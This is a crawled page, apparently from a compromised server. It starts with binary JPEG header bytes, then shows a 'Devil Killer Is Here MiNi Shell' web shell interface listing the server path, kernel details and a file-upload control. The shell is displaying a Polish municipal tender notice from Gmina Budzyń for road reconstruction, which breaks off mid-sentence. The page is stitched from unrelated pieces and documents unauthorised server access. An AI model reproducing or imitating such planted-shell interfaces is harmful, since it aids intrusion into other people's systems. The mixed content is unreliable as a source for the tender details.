JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230727/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230727/0032915501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa i remont dróg w Gminie Budzyń </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA BUDZYŃ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570791017</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Przemysłowa 16 A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Budzyń</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-840</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL411 - Pilski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">67 2843201; 2843313</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">67 2843 370</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@budzyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.budzyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa i remont dróg w Gminie Budzyń </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ab3c61ec-2c79-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00329155</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-07-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00025970/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.19 Remont nawierzchni drogi gminnej nr 201550P w m. Prosna</p> <p class="mb-0">1.1.20 Przebudowa drogi gminnej nr 201515P w m. Nowa Wieś Wyszyńska - Etap I</p> <p class="mb-0">1.1.21 Przebudowa drogi gminnej nr 201507P w m. Wyszynki - etap I</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-3063ded5-2c6e-11ee-a60c-9ec5599dddc1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">11. Niezbędne wymagania sprzętowoaplikacyjne<br/>umożliwiające pracę na Platformie tj.:<br/> stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/> komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/> zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer<br/>minimalnie wersja 10.0 lub Google Chrome wersji 71.0.3 lub Firefox od wersji 65.0.1 lub Safari od wersji 12.0.2,<br/> włączona obsługa JavaScript;<br/> zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>5. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Centrum Pomocy Platformy pod adresem<br/>https://ezamowienia.gov.pl/pl/komponent-edukacyjny/.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje dotyczące RODO zawarto w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje dotyczące RODO zawarto w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GKM.272.11.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 1790180,95 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie przebudowy drogi gminnej nr 201507P,<br/>w m. Wyszynki, od km. 0+010,5 do km. 0+390,0 na części działki o nr 223/1, obręb - Wyszynki, jednostka ewidencyjna –<br/>Budzyń obszar wiejski.<br/>Stan istniejący:<br/>• teren niezabudowany,<br/>• przekrój poprzeczny jezdni – drogowy,<br/>• nawierzchnia jezdni – ulepszona tłuczniem kamiennym,<br/>• szerokość istniejącej jezdni – 4,0 m,<br/>• brak chodników,<br/>• pobocze gruntowe (po stronie prawej i lewej) o szerokości – od 1,0 do 1,5 m.<br/>Opis stanu istniejącego – na przebudowywanym odc. jezdnia umocniona jest tłuczniem kamiennym. Niweleta poprzeczna i<br/>podłużna jezdni jest znacznie pofałdowana. W konstrukcji nawierzchni występują lokalne ubytki. Zdiagnozowane czynniki<br/>powodują, że zaplanowano wykonanie ułożenia nowej nawierzchni jezdni z mieszanki mineralno bitumicznej o szerokości<br/>4,0 m i na dług. 379,5 mb.<br/>Planowany ogólny zakres robót:<br/>• wyrównanie istniejącego profilu jezdni mieszanką kruszyw niezwiązanych C50/30 o grubości 15 cm,<br/>• wykonanie podbudowy zasadniczej mieszanką kruszyw niezwiązanych C50/30 o grubości<br/>22 cm,<br/>• wykonanie nawierzchni jezdni z mieszanek mineralno - bitumicznych (wiążącej i ścieralnej) o łącznej grubości 9 cm,<br/>• wykonanie umocnienia nawierzchni na dziewięciu zjazdach mieszanką mineralno - bitumiczną o łącznej grubości 8 cm<br/>ułożonej na podbudowie z mieszanki kruszyw niezwiązanych C50/30 o grubości 20 cm,<br/>• odtworzenie wraz z umocnieniem poboczy mieszanką niezwiązaną z kruszywem C50/30 (klińcem 0/31,5 mm), na<br/>szerokości 1,0 m i o grubości 10 cm.<br/>Odwodnienie pasa drogowego odbywać się będzie powierzchniowo do przyległych zieleńców.<br/>Niweletę jezdni pozostawiono bez zmian i jest ona dostosowano do niwelety przyległych pól.<br/>Odtworzenie trasy i punktów wysokościowych.<br/>Dane projektowe:<br/>• klasa drogi – D,<br/>• prędkość projektowa – Vp=40 km/h,<br/>• ulice jedno jezdniowa z dwoma pasami ruchu,<br/>• przekrój podstawowy - jezdni 4,0 m,<br/>• przebieg trasy – bez wykopów i nasypów,<br/>• kategoria ruchu – KR-1,<br/>• max pochylenie podłużne 10 %.<br/>• głębokość przemarzania gruntu – 0,8 m,<br/>• grupa nośności podłoża gruntowego – G1/G2.<br/>• spadki poprzeczny jezdni na przekroju podstawowym oraz na łukach poziomych – 2 % (dwustronny),<br/>• szerokość pobocza – 1,0 m,<br/>• proj. 2 zjazdy szer. 4 m (dł. 2 i 3 m) - warstwa mrozoochronna z piasku wg. normy<br/>PN-B-11113, grub. 15 cm,podbudowa z mieszanki niezwiązanej z kruszywem C50/30, grub. warstwy 20 cm, w-wa ścieralna<br/>z mieszanki mineralno - asfaltowa AC11S 50/70, grub. 4 cm, na warstwie wiążącej z mieszanki mineralno - asfaltowa AC-<br/>16W 50/70, grub. 4 cm.<br/>• połączenie jezdni z zjazdami będzie w formie skosów o wielkości 1,5 m, spadek poprzeczny zjazdów wynosi 2,0 % w<br/>kierunku do jezdni, spadek podłużny – dostosowany do przyległej jezdni.<br/>Szczegółowy opis i zakres wykonania przedmiotu zamówienia dla poszczególnych części zamówienia zawiera<br/>dokumentacja projektowa, w skład której wchodzą:<br/>- dokumentacje techniczna,<br/>- przedmiary robót (kosztorysy ofertowe),<br/>- Specyfikacje Techniczne Wykonania i Odbioru Robót budowlanych ( dalej STWiORB).<br/>Dokumentacja projektowa dostępna jest na stronie internetowej prowadzonego postępowania pod adresem :<br/>https://ezamowienia.gov.pl<br/>Powyższe dokumenty zostały pogrupowane odpowiednio dla każdej z części postępowania przetargowego i stanowią<br/>załącznik nr 9 do niniejszej SWZ.<br/>Uwaga:<br/>Załączone przedmiary robót(kosztorysy ofertowe) stanowią zakresy prac objętych niniejszym postępowaniem i służą<br/>wykonawcom jako pomoc w oszacowaniu kosztów inwestycji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45233252-0 - Roboty w zakresie nawierzchni ulic</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert przyznając punkty w ramach<br/>poszczególnych kryteriów oceny ofert, przyjmując zasadę 1%=1 punkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji na wykonane roboty i zamontowane urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie remontu nawierzchni drogi gminnej nr 201550P w miejscowości Prosna obręb -<br/>Prosna, jednostka ewidencyjna –Budzyń obszar wiejski na działkach oznaczonych numerami 46, 53, 54, 98, 99 na odcinku<br/>od km 0+149,00 km do 0+957,50 o łącznej długości 808,50 m.<br/>Stan istniejący:<br/>Istniejący pas drogowy na projektowanym odcinku posiada nawierzchnię gruntową, odcinki utwardzone z tłucznia oraz<br/>destruktu. Pas drogowy wyposażony jest w sieci zgodnie z mapą geodezyjną.<br/>Planowany ogólny zakres robót:<br/>• wykonanie nawierzchni jezdni z betonu asfaltowego szer. 4,00 m<br/>• wykonanie zjazdów z betonu asfaltowego<br/>• wykonanie zjazdów z kostki betonowej<br/>• wykonanie poboczy gruntowych szer. 0,75 m<br/>• wykonanie mijanek z betonu asfaltowego<br/>Parametry techniczne zaprojektowanej drogi:<br/>Na przedmiotowym odcinku projektowana droga posiada parametry techniczne zgodne z Rozporządzeniem Ministra<br/>Transportu i Gospodarki Morskiej z dnia 02 marca 1999r. w sprawie warunków technicznych, jakim powinny odpowiadać<br/>drogi publiczne i ich usytuowanie:<br/>- klasa drogi ,,D’’ droga dojazdowa,<br/>- prędkość projektowa Vp = 30 km/h,<br/>- dostępność – nieograniczona<br/>- kategoria ruchu KR1<br/>- szerokość pasa ruchu – 2,00 m<br/>- przekrój jezdni 2 x 2,00 m = 4,00 m<br/>- przekrój jezdni daszkowy<br/><br/>- pochylenie poprzeczne poboczy 8%<br/>- spadek poprzeczny jezdni 2%<br/>Konstrukcja jezdni, mijanki i zjazdu bitumicznego:<br/>- w-wa ścieralna z ba AC11S 50/70 KR1-2 gr. 4 cm<br/>- w-wa wiążąca z ba AC11S 50/70 KR1-2 gr. 4 cm<br/>- podbudowa zasadnicza z mieszanki niezwiązanej C90/3 gr. 10 cm<br/>- podbudowa pomocnicza z mieszanki niezwiązanej gr. 20 cm<br/>- warstwa odcinająca z piasku średniego gr. 15 cm<br/>Konstrukcja zjazdu z kostki betonowej:<br/>- kostka betonowa wibroprasowana gr. 8 cm<br/>- podsypka cementowo-piaskowa gr. 5 cm<br/>- podbudowa zasadnicza z mieszanki niezwiązanej C90/3 gr. 20 cm<br/>- w-wa odcinająca z piasku średnioziarnistego gr. 15 cm<br/>Kolizje:<br/>Na projektowanym odcinku występują kolizje z siecią telekomunikacyjną oraz z siecią gazowniczą. W przypadku sieci<br/>gazowniczej na odcinkach zlokalizowania gazociągu gn D 63 pod jezdnią należy zachować wymagane minimalne przekrycie<br/>zgodnie z warunkami i uzgodnieniem wydanym przez właściciela sieci gazowej. Szczegółowe warunki prowadzenia prac<br/>drogowych na odcinkach występowania gazociągu przedstawiono w STWiORB dla wykonania koryta pod konstrukcję jezdni.<br/>W przypadku sieci telekomunikacyjnej sposób usunięcia kolizji znajduje się w odrębnym opracowaniu branżowym i polega<br/>na wykonaniu wstawki kablowej kabli abonenckich XzTKMXpw 5x2x0,5 zgodnie z mapą sytuacyjną. Kable ziemne<br/>obustronnie połączyć z istniejącymi kablami za pomocą osłon KM-2. Po zakończeniu wykonać pomiary prądem stałym. W<br/>miejscu wjazdu do posesji istniejący kabel zabezpieczyć rurą dwudzielną A11OPS. Po wbudowaniu projektowanych<br/>urządzeń, należy zlikwidować nieczynne uzbrojenie telekomunikacyjne i przekazać firmie ORANGE POLSKA S.A (zgodnie z<br/>planem sytuacyjnym).<br/>Szczegółowy opis i zakres wykonania przedmiotu zamówienia dla poszczególnych części zamówienia zawiera<br/>dokumentacja projektowa, w skład której wchodzą:<br/>- dokumentacja techniczna<br/>- przedmiary robót (kosztorysy ofertowe),<br/>- Specyfikacje Techniczne Wykonania i Odbioru Robót budowlanych ( dalej STWiORB).<br/>Dokumentacja projektowa dostępna jest na stronie internetowej prowadzonego postępowania pod adresem :<br/>https://ezamowienia.gov.pl<br/>Powyższe dokumenty zostały pogrupowane odpowiednio dla każdej z części postępowania przetargowego i stanowią<br/>załącznik nr 9 do niniejszej SWZ.<br/>Uwaga:<br/>Załączone przedmiary robót(kosztorysy ofertowe) stanowią zakresy prac objętych niniejszym postępowaniem i służą<br/>wykonawcom jako pomoc w oszacowaniu kosztów inwestycji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233252-0 - Roboty w zakresie nawierzchni ulic</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert przyznając punkty w ramach<br/>poszczególnych kryteriów oceny ofert, przyjmując zasadę 1%=1 punkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji na wykonane roboty i zamontowane urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie przebudowy drogi gminnej nr 201515P, w m. Nowa Wieś Wyszyńska, od km.<br/>0+423,5 do km. 1+420,0 na części działek o nr 114 i 155, obręb - Nowa Wieś Wyszyńska, jednostka ewidencyjna – Budzyń<br/>obszar wiejski.<br/>Stan istniejący:<br/>• teren niezabudowany,<br/>• przekrój poprzeczny jezdni – drogowy,<br/>• nawierzchnia jezdni – ulepszona tłuczniem kamiennym,<br/>• szerokość istniejącej jezdni – od 4,0 do 4,5 m,<br/>• brak chodników,<br/>• pobocze gruntowe (po stronie prawej i lewej) o szerokości – od 1,0 do 1,5 m.<br/>• jezdnia umocniona tłuczniem kamiennym.<br/>Niweleta poprzeczna i podłużna jezdni jest lekko pofałdowana. W konstrukcji nawierzchni występują lokalne ubytki.<br/>Zdiagnozowane czynniki powodują, że zaplanowano wykonanie ułożenia nowej nawierzchni jezdni z mieszanki mineralno<br/>bitumicznej o szerokości 4,0 m i na dług. 996,5 mb.<br/>Planowany ogólny zakres robót:<br/>• wyrównanie istniejącego profilu jezdni mieszanką kruszyw niezwiązanych C50/30 o grubości 5 cm,<br/>• wykonanie nawierzchni jezdni z mieszanek mineralno - bitumicznych (wiążącej i ścieralnej) o łącznej grubości 9 cm,<br/>• wykonanie umocnienia nawierzchni na dziewięciu zjazdach mieszanką mineralno - bitumiczną o łącznej grubości 8 cm<br/>ułożonej na podbudowie z mieszanki kruszyw niezwiązanych C50/30 o grubości od 5 do 20 cm,<br/>• odtworzenie wraz z umocnieniem poboczy mieszanką niezwiązaną z kruszywem C50/30 (klińcem 0/31,5 mm), na<br/>szerokości 1,0 m i o grubości 15 cm.<br/>Odwodnienie pasa drogowego odbywać się będzie powierzchniowo do przyległych rowów przydrożnych lub do zieleńców.<br/>Niweletę jezdni pozostawiono bez zmian i jest ona dostosowano do niwelety przyległych pól i posesji. Odtworzenie trasy i<br/>punktów wysokościowych.<br/>Dane projektowe i parametry techniczne:<br/>• klasa drogi – D,<br/>• prędkość projektowa – Vp=40 km/h,<br/>• ulice jedno jezdniowa z dwoma pasami ruchu,<br/>• przekrój podstawowy - jezdni 4,0 m,<br/>• przebieg trasy – bez wykopów i nasypów,<br/>• kategoria ruchu – KR-1,<br/>• max pochylenie podłużne 10 %.<br/>• głębokość przemarzania gruntu – 0,8 m,<br/>• grupa nośności podłoża gruntowego – G1/G2.<br/>• długość drogi – 996,5 m,<br/>• szerokość jezdni – przekrój podstawowy 4,0 m,<br/>• spadek poprzeczny jezdni na przekroju podstawowym – 2 % (dwustronny lub jednostronny),<br/>• spadek poprzeczny jezdni na łukach poziomych R1 i R2 – 2 % (dwustronny),<br/>• szerokość pobocza – 1,0 m.<br/>Przebieg drogi w planie – nie projektuje się zmian w przebiegu drogi. Przebieg drogi w przekroju podłużnym – 